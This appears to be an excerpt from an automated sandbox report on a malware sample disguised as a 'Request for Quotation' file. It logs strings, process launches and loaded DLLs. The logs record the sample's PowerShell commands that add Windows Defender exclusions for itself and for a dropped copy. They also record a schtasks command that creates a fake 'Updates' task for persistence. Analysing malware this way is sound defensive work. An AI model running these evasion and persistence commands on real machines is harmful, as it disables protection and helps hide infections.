Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003378000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003345000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003353000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003385000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr	Binary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE);

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

File read: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Process created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
